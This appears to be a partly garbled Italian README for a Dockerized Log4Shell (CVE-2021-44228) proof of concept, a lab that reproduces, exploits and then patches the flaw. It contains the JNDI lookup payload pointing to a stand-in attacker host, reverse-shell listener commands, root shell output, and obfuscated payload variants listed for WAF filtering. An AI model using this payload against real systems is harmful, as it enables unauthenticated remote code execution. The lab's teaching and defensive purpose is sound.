
Log4Shell (CVE-2021-44228) PoC
Riprodurre, sfruttare e correggere una CVE critica nota in un ambiente Dockerizzato. Questa Prova di Concetto dimostra CVE-2021-44228 (Log4Shell) in un'applicazione Spring Boot.
CVE: 2021-44228
CVSS: 10.0 (Critico)
Componente interessato: Apache Log4j (<= 2.14.1)
${...}) per risolvere dinamicamente i valori all'interno dei messaggi di log.${jndi:ldap://attacker.com:1389/a}.Exploit.class.Exploit.class via HTTP.Exploit viene eseguito, generando una reverse shell verso l'attaccante.Impatto: RCE non autenticata - massima gravità possibile.
Chi/cosa è a rischio:
Conseguenze:
make build start
nc -l 4444
make exploit
/bin/sh: can't access tty; job control turned off
$ id
uid=0(root) gid=0(root) groups=0(root) ...
make patch
make build start
nc -l 4444
make exploit
# -> observe no reverse shell
${jndi: patterns) con un WAF o middleware.-Dlog4j2.formatMsgNoLookups=true
-Dcom.sun.jndi.ldap.object.trustURLCodebase=false
gradle dependencies, Snyk, Wiz, ecc.).log4j-core-*.jar, inclusi fat JAR.${jndi:...}, ${${lower:j}ndi:...}, ecc.).